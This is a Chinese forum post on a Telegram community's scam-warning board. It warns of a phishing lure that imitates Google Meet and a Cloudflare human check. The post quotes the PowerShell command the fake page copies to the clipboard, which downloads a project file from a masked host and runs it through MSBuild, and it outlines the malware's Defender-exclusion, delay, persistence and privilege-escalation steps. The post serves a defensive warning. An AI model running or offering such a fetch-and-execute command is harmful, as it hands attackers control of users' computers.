收藏本站
首页
开启辅助访问
切换到窄版
登录
立即注册
首页
签到
TG商城
论坛
BBS
频道
群聊
QQ群
搜索
搜索
本版
帖子
用户
TG论坛-自由的讨论TG资源-TG中文论坛 - TG论坛
»
论坛
›
论坛版块
›
防骗曝光
›
关于TG新型钓鱼的预警,模仿谷歌会议
返回列表
发新帖
关于TG新型钓鱼的预警,模仿谷歌会议
[复制链接]
23
|
0
|
昨天 21:52
|
显示全部楼层
|
阅读模式
大概简述
本来打算睡觉了 没想到还有高手,第一次我没搭理他,后面他说他可以付费来请教我一些问题,但是非要和我语音(此时我觉得有意思起来了),我就顺着他说可以,结果发了一个网址,如下图(网址是模仿谷歌会议),打开之后如图3(模仿CF人机验证),此时浏览器会默认复制如下内容:
powershell -c "iwr https://*****.com/x.proj -o C:\ProgramData\s.proj; & $env:windirMicrosoft.NET\Framework64\v4.0.30319\msbuild.exe C:\ProgramData\s.proj"
网页大概内容是把复制的这些在终端运行获取验证码过人机验证,但是如果你真这样做了,恭喜你,你电脑已经是他的玩物了。
关于这个病毒样本我简单分析了下,大概流程如下:
使用合法的MSBuild项目文件格式伪装,绕过基础文件类型检查
利用微软官方XML命名空间增加可信度
通过MSBuild执行链调用PowerShell,规避进程监控
使用cmd /c嵌套调用实现命令混淆,随后把落地木马添加到Defender(windows自带杀软)白名单,延迟76秒运行来规避其他杀软扫描,最后根据运行木马的当前权限执行不同的后续操作,如果是管理员则执行计划任务来达到定时运行,电脑重启自动运行等,如果非管理员则执行UAC提权等操作再进行权限维持等操作,后续就是木马该有的一些操作了,不过值得一提的是貌似该木马的制作人是老毛子,木马有部分俄语提示:
Попытка $attempt из $maxAttempts...
最后,任何人让你访问任何未知的网址都要谨慎--消息来源-米娅频道
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
回复
使用道具
举报
返回列表
发新帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
浏览过的版块
Ai智能
TGLT
85
主题
89
帖子
880
积分
管理员
积分
880
加好友
发消息
回复楼主
返回列表
社区日常
技术交流
Ai智能
闲置交易
悬赏求助
推广专区
防骗曝光
活动线报
闲聊灌水
趣站分享
站务管理
意见反馈
图文推荐
如何预防被电报冻结账号
2025-05-08
科学上网工具合集
2025-05-09
账号推荐使用干净的IP?什么是干净的ip?
2025-05-07
Telegram 几个术语
2025-10-24
TG仿微信主题
前天 19:11
热门排行
1
科学上网工具合集
2
分享一下Telegram申诉文案
3
【资源板块】— TG资源共享
4
为什么我的Telegram账号会突然被注销?
5
2025最新版Telegram中文设置方法:电脑版/
6
如何预防被电报冻结账号
7
测试
8
账号推荐使用干净的IP?什么是干净的ip?
9
Telegram成品号与小号
10
【日常板块】— 分享生活 点滴记录